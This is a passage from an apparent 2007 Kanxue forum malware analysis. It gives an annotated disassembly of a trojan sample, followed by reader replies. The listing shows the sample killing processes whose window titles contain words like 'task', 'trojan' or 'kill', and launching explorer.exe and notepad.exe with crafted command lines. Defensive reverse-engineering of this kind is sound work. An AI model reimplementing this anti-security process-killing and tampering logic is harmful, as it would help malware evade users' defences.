  004022ED  |.  83C4 08    ||ADD ESP,8
  004022F0  |.  85C0       ||TEST EAX,EAX
  004022F2  |.  75 78       ||JNZ SHORT A0002798.0040236C
  004022F4  |.  68 C8A14200 ||PUSH A0002798.0042A1C8
  004022F9  |.  8B8D D0FEFFFF ||MOV ECX,DWORD PTR SS:[EBP-130]
  004022FF  |.  51          ||PUSH ECX
  00402300  |.  E8 4B4B0000 ||CALL A0002798.00406E50
  00402305  |.  83C4 08    ||ADD ESP,8
  00402308  |.  85C0       ||TEST EAX,EAX
  0040230A  |.  75 60       ||JNZ SHORT A0002798.0040236C
  0040230C  |.  68 BCA14200 ||PUSH A0002798.0042A1BC                ;  //这里OD看不见，用C32ASM分析的是碰上窗口有“任务”的就喀嚓
  00402311  |.  8B95 D0FEFFFF ||MOV EDX,DWORD PTR SS:[EBP-130]
  00402317  |.  52          ||PUSH EDX
  00402318  |.  E8 334B0000 ||CALL A0002798.00406E50
  0040231D  |.  83C4 08    ||ADD ESP,8
  00402320  |.  85C0       ||TEST EAX,EAX
  00402322  |.  75 48       ||JNZ SHORT A0002798.0040236C
  00402324  |.  68 B4A14200 ||PUSH A0002798.0042A1B4
  00402329  |.  8B85 D0FEFFFF ||MOV EAX,DWORD PTR SS:[EBP-130]
  0040232F  |.  50          ||PUSH EAX
  00402330  |.  E8 1B4B0000 ||CALL A0002798.00406E50
  00402335  |.  83C4 08    ||ADD ESP,8
  00402338  |.  85C0       ||TEST EAX,EAX
  0040233A  |.  75 30       ||JNZ SHORT A0002798.0040236C
  0040233C  |.  68 ACA14200 ||PUSH A0002798.0042A1AC                ;  //这里OD看不见，用C32ASM分析的是碰上窗口有“木马”的就喀嚓
  00402341  |.  8B8D D0FEFFFF ||MOV ECX,DWORD PTR SS:[EBP-130]
  00402347  |.  51          ||PUSH ECX
  00402348  |.  E8 034B0000 ||CALL A0002798.00406E50
  0040234D  |.  83C4 08    ||ADD ESP,8
  00402350  |.  85C0       ||TEST EAX,EAX
  00402352  |.  75 18       ||JNZ SHORT A0002798.0040236C
  00402354  |.  68 A4A14200 ||PUSH A0002798.0042A1A4                ;  //这里OD看不见，用C32ASM分析的是碰上窗口有“杀”的就喀嚓
  00402359  |.  8B95 D0FEFFFF ||MOV EDX,DWORD PTR SS:[EBP-130]
  0040235F  |.  52          ||PUSH EDX
  00402360  |.  E8 EB4A0000 ||CALL A0002798.00406E50
  00402365  |.  83C4 08    ||ADD ESP,8
  00402368  |.  85C0       ||TEST EAX,EAX
  0040236A  |.  74 2F       ||JE SHORT A0002798.0040239B
  0040236C  |>  8BF4       ||MOV ESI,ESP
  0040236E  |.  6A 01       ||PUSH 1
  00402370  |.  8BFC       ||MOV EDI,ESP
  00402372  |.  8B85 DCFEFFFF ||MOV EAX,DWORD PTR SS:[EBP-124]
  00402378  |.  50          ||PUSH EAX                            ; /ProcessId
  00402379  |.  6A 00       ||PUSH 0                               ; |Inheritable = FALSE
  0040237B  |.  68 FF0F1F00 ||PUSH 1F0FFF                         ; |Access = PROCESS_ALL_ACCESS
  00402380  |.  FF15 E0124300 ||CALL DWORD PTR DS:[<&KERNEL32.OpenProc>; \OpenProcess
  00402386  |.  3BFC       ||CMP EDI,ESP
  00402388  |.  E8 53440000 ||CALL A0002798.004067E0
  0040238D  |.  50          ||PUSH EAX                            ; |hProcess
  0040238E  |.  FF15 DC124300 ||CALL DWORD PTR DS:[<&KERNEL32.Terminat>; \TerminateProcess
  00402394  |.  3BF4       ||CMP ESI,ESP
  00402396  |.  E8 45440000 ||CALL A0002798.004067E0
  0040239B  |>  8D8D D4FEFFFF ||LEA ECX,DWORD PTR SS:[EBP-12C]
  004023A1  |.  51          ||PUSH ECX                            ; /pProcessentry
  004023A2  |.  8B55 FC    ||MOV EDX,DWORD PTR SS:[EBP-4]          ; |
  004023A5  |.  52          ||PUSH EDX                            ; |hSnapshot
  004023A6  |.  E8 59010000 ||CALL <JMP.&KERNEL32.Process32Next>    ; \Process32Next
  004023AB  |.  85C0       ||TEST EAX,EAX
  004023AD  |.^ 0F85 7EFEFFFF |\JNZ A0002798.00402231
  004023B3  |.  8BF4       |MOV ESI,ESP
  004023B5  |.  8B45 FC    |MOV EAX,DWORD PTR SS:[EBP-4]
  004023B8  |.  50          |PUSH EAX                               ; /hObject
  004023B9  |.  FF15 D4124300 |CALL DWORD PTR DS:[<&KERNEL32.CloseHand>; \CloseHandle
  004023BF  |.  3BF4       |CMP ESI,ESP
  004023C1  |.  E8 1A440000 |CALL A0002798.004067E0
  004023C6  |.  8BF4       |MOV ESI,ESP
  004023C8  |.  6A 64       |PUSH 64                               ; /Timeout = 100. ms
  004023CA  |.  FF15 D0124300 |CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
  004023D0  |.  3BF4       |CMP ESI,ESP
  004023D2  |.  E8 09440000 |CALL A0002798.004067E0
  004023D7  |.^ E9 02FEFFFF \JMP A0002798.004021DE
  004023DC  |>  33C0       XOR EAX,EAX
  004023DE  |.  5F          POP EDI
  004023DF  |.  5E          POP ESI
  004023E0  |.  5B          POP EBX
  004023E1  |.  81C4 70010000 ADD ESP,170
  004023E7  |.  3BEC       CMP EBP,ESP
  004023E9  |.  E8 F2430000 CALL A0002798.004067E0
  004023EE  |.  8BE5       MOV ESP,EBP
  004023F0  |.  5D          POP EBP
  004023F1  \.  C2 0400    RETN 4



  0041365F .  51          PUSH ECX                               ; /Arg4
  00413660 .  68 F8EB4200 PUSH A0002798.0042EBF8                ; |Arg3 = 0042EBF8
  00413665 .  68 80A14200 PUSH A0002798.0042A180                ; |; |Arg2 = 0042A180 ASCII "%sexplorer.exe %s" //看来又对EXPLORER做了手脚，估计是插入线程
  0041366A .  8D95 ACFDFFFF LEA EDX,DWORD PTR SS:[EBP-254]          ; |
  00413670 .  52          PUSH EDX                               ; |Arg1
  00413671 .  E8 8A2FFFFF CALL A0002798.00406600                ; \A0002798.00406600
  00413676 .  83C4 10    ADD ESP,10
  00413679 .  8BF4       MOV ESI,ESP
  0041367B .  8D45 F0    LEA EAX,DWORD PTR SS:[EBP-10]
  0041367E .  50          PUSH EAX                               ; /pProcessInfo
  0041367F .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]          ; |
  00413682 .  51          PUSH ECX                               ; |pStartupInfo
  00413683 .  6A 00       PUSH 0                                  ; |CurrentDir = NULL
  00413685 .  6A 00       PUSH 0                                  ; |pEnvironment = NULL
  00413687 .  6A 20       PUSH 20                               ; |CreationFlags = NORMAL_PRIORITY_CLASS
  00413689 .  6A 00       PUSH 0                                  ; |InheritHandles = FALSE
  0041368B .  6A 00       PUSH 0                                  ; |pThreadSecurity = NULL
  0041368D .  6A 00       PUSH 0                                  ; |pProcessSecurity = NULL
  0041368F .  8D95 ACFDFFFF LEA EDX,DWORD PTR SS:[EBP-254]          ; |
  00413695 .  52          PUSH EDX                               ; |CommandLine
  00413696 .  6A 00       PUSH 0                                  ; |ModuleFileName = NULL
  00413698 .  FF15 F8124300 CALL DWORD PTR DS:[<&KERNEL32.CreateProc>; \CreateProcessA
  0041369E .  3BF4       CMP ESI,ESP
  004136A0 .  E8 3B31FFFF CALL A0002798.004067E0
  004136A5 >  8BF4       MOV ESI,ESP
  004136A7 .  FF15 60134300 CALL DWORD PTR DS:[<&KERNEL32.GetCommand>; [GetCommandLineA
  004136AD .  3BF4       CMP ESI,ESP
  004136AF .  E8 2C31FFFF CALL A0002798.004067E0
  004136B4 .  8985 A4FDFFFF MOV DWORD PTR SS:[EBP-25C],EAX          ;  我们的TXT文档……
  004136BA .  68 3CA04200 PUSH A0002798.0042A03C                ;  ASCII ".txt"
  004136BF .  8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
  004136C5 .  50          PUSH EAX
  004136C6 .  E8 8537FFFF CALL A0002798.00406E50
  004136CB .  83C4 08    ADD ESP,8
  004136CE .  85C0       TEST EAX,EAX
  004136D0 .  75 1C       JNZ SHORT A0002798.004136EE
  004136D2 .  68 28A04200 PUSH A0002798.0042A028                ;  ASCII ".TXT"
  004136D7 .  8B8D A4FDFFFF MOV ECX,DWORD PTR SS:[EBP-25C]
  004136DD .  51          PUSH ECX
  004136DE .  E8 6D37FFFF CALL A0002798.00406E50
  004136E3 .  83C4 08    ADD ESP,8
  004136E6 .  85C0       TEST EAX,EAX
  004136E8 .  0F84 5E010000 JE A0002798.0041384C
  004136EE >  C785 9CFCFFFF>MOV DWORD PTR SS:[EBP-364],0
  004136F8 .  EB 0F       JMP SHORT A0002798.00413709
  004136FA >  8B95 9CFCFFFF MOV EDX,DWORD PTR SS:[EBP-364]
  00413700 .  83C2 01    ADD EDX,1
  00413703 .  8995 9CFCFFFF MOV DWORD PTR SS:[EBP-364],EDX
  00413709 >  81BD 9CFCFFFF>CMP DWORD PTR SS:[EBP-364],0DC
  00413713 .  0F8D B5000000 JGE A0002798.004137CE
  00413719 .  8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
  0041371F .  0385 9CFCFFFF ADD EAX,DWORD PTR SS:[EBP-364]
  00413725 .  8B8D 9CFCFFFF MOV ECX,DWORD PTR SS:[EBP-364]
  0041372B .  8A50 20    MOV DL,BYTE PTR DS:[EAX+20]
  0041372E .  88940D A4FCFF>MOV BYTE PTR SS:[EBP+ECX-35C],DL
  00413735 .  8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
  0041373B .  0385 9CFCFFFF ADD EAX,DWORD PTR SS:[EBP-364]
  00413741 .  8A48 1D    MOV CL,BYTE PTR DS:[EAX+1D]
  00413744 .  888D A0FCFFFF MOV BYTE PTR SS:[EBP-360],CL
  0041374A .  8B95 A4FDFFFF MOV EDX,DWORD PTR SS:[EBP-25C]
  00413750 .  0395 9CFCFFFF ADD EDX,DWORD PTR SS:[EBP-364]
  00413756 .  8A42 1E    MOV AL,BYTE PTR DS:[EDX+1E]
  00413759 .  8885 A1FCFFFF MOV BYTE PTR SS:[EBP-35F],AL
  0041375F .  8B8D A4FDFFFF MOV ECX,DWORD PTR SS:[EBP-25C]
  00413765 .  038D 9CFCFFFF ADD ECX,DWORD PTR SS:[EBP-364]
  0041376B .  8A51 1F    MOV DL,BYTE PTR DS:[ECX+1F]
  0041376E .  8895 A2FCFFFF MOV BYTE PTR SS:[EBP-35E],DL
  00413774 .  8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
  0041377A .  0385 9CFCFFFF ADD EAX,DWORD PTR SS:[EBP-364]
  00413780 .  8A48 20    MOV CL,BYTE PTR DS:[EAX+20]
  00413783 .  888D A3FCFFFF MOV BYTE PTR SS:[EBP-35D],CL
  00413789 .  68 3CA04200 PUSH A0002798.0042A03C                ;  ASCII ".txt"
  0041378E .  8D95 A0FCFFFF LEA EDX,DWORD PTR SS:[EBP-360]
  00413794 .  52          PUSH EDX
  00413795 .  E8 B636FFFF CALL A0002798.00406E50
  0041379A .  83C4 08    ADD ESP,8
  0041379D .  85C0       TEST EAX,EAX
  0041379F .  75 18       JNZ SHORT A0002798.004137B9
  004137A1 .  68 28A04200 PUSH A0002798.0042A028                ;  ASCII ".TXT"
  004137A6 .  8D85 A0FCFFFF LEA EAX,DWORD PTR SS:[EBP-360]
  004137AC .  50          PUSH EAX
  004137AD .  E8 9E36FFFF CALL A0002798.00406E50
  004137B2 .  83C4 08    ADD ESP,8
  004137B5 .  85C0       TEST EAX,EAX
  004137B7 .  74 10       JE SHORT A0002798.004137C9
  004137B9 >  8B8D 9CFCFFFF MOV ECX,DWORD PTR SS:[EBP-364]
  004137BF .  C6840D A5FCFF>MOV BYTE PTR SS:[EBP+ECX-35B],0
  004137C7 .  EB 05       JMP SHORT A0002798.004137CE
  004137C9 >^ E9 2CFFFFFF JMP A0002798.004136FA
  004137CE >  8D95 A4FCFFFF LEA EDX,DWORD PTR SS:[EBP-35C]
  004137D4 .  52          PUSH EDX
  004137D5 .  8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
  004137DB .  50          PUSH EAX
  004137DC .  E8 3F30FFFF CALL A0002798.00406820
  004137E1 .  83C4 08    ADD ESP,8
  004137E4 .  8BF4       MOV ESI,ESP
  004137E6 .  6A 00       PUSH 0                                  ; /Style = MB_OK|MB_APPLMODAL
  004137E8 .  6A 00       PUSH 0                                  ; |Title = NULL
  004137EA .  8B8D A4FDFFFF MOV ECX,DWORD PTR SS:[EBP-25C]          ; |
  004137F0 .  51          PUSH ECX                               ; |Text
  004137F1 .  6A 00       PUSH 0                                  ; |hOwner = NULL
  004137F3 .  FF15 78144300 CALL DWORD PTR DS:[<&USER32.MessageBoxA>>; \MessageBoxA
  004137F9 .  3BF4       CMP ESI,ESP
  004137FB .  E8 E02FFFFF CALL A0002798.004067E0
  00413800 .  8B95 A4FDFFFF MOV EDX,DWORD PTR SS:[EBP-25C]
  00413806 .  52          PUSH EDX                               ; /Arg4
  00413807 .  68 F8EB4200 PUSH A0002798.0042EBF8                ; |Arg3 = 0042EBF8
  0041380C .  68 5CA14200 PUSH A0002798.0042A15C                ; ||Arg2 = 0042A15C ASCII "%snotepad.exe %s" //该NOTEPAD倒霉了
  00413811 .  8D85 ACFDFFFF LEA EAX,DWORD PTR SS:[EBP-254]          ; |
  00413817 .  50          PUSH EAX                               ; |Arg1
  00413818 .  E8 E32DFFFF CALL A0002798.00406600                ; \A0002798.00406600


--------------------------------------------------------------------------------
【经验总结】
  终于分析完了，555555555，刚才点了个F4，幸好没直接在关键部分，否则…………
  呵呵：）希望斑竹鼓励新人，能＋个声望（您上次扣了一个，将功补过：P）要不然就【我都不敢写了，上次这么写CCD就骂我来着：（如果您觉得怎么样，就怎么样吧，别又扣一个：）】

--------------------------------------------------------------------------------
【版权声明】: 本文原创于看雪技术论坛, 转载请注明作者并保持文章的完整, 谢谢!

                                                   2007年06月03日下午 10:35:08

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・2

免费・0

支持

最新回复 (3)
arhat 雪币： 2108 活跃值： (208) 能力值： (RANK：1260 ) 在线值：发帖 79 回帖 396 粉丝 9 关注私信	arhat 31 2 楼原创是不错但个人觉得水份较大，高手不愿看，新手又看不懂。楼主如果能静下心，仔细写出对大家有帮助的文章，那么一定会得到大家的认可。 PS：希望看到分析心得，而不是贴大段的代码。 2007-6-5 21:42 0
NONAME剑人雪币： 740 活跃值： (952) 能力值： ( LV9，RANK：160 ) 在线值：发帖 59 回帖 407 粉丝 13 关注私信	NONAME剑人 3 3 楼谢谢您的评价，我会继续努力的………… 2007-6-5 21:44 0
Osris 雪币： 189 活跃值： (56) 能力值： ( LV6，RANK：90 ) 在线值：发帖 23 回帖 128 粉丝 0 关注私信	Osris 2 4 楼【软件大小】: 204KB 2007-6-5 22:03 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

NONAME剑人

发帖

407

回帖

160

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (3)
arhat 雪币： 2108 活跃值： (208) 能力值： (RANK：1260 ) 在线值：发帖 79 回帖 396 粉丝 9 关注私信	arhat 31 2 楼原创是不错但个人觉得水份较大，高手不愿看，新手又看不懂。楼主如果能静下心，仔细写出对大家有帮助的文章，那么一定会得到大家的认可。 PS：希望看到分析心得，而不是贴大段的代码。 2007-6-5 21:42 0
NONAME剑人雪币： 740 活跃值： (952) 能力值： ( LV9，RANK：160 ) 在线值：发帖 59 回帖 407 粉丝 13 关注私信	NONAME剑人 3 3 楼谢谢您的评价，我会继续努力的………… 2007-6-5 21:44 0
Osris 雪币： 189 活跃值： (56) 能力值： ( LV6，RANK：90 ) 在线值：发帖 23 回帖 128 粉丝 0 关注私信	Osris 2 4 楼【软件大小】: 204KB 2007-6-5 22:03 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复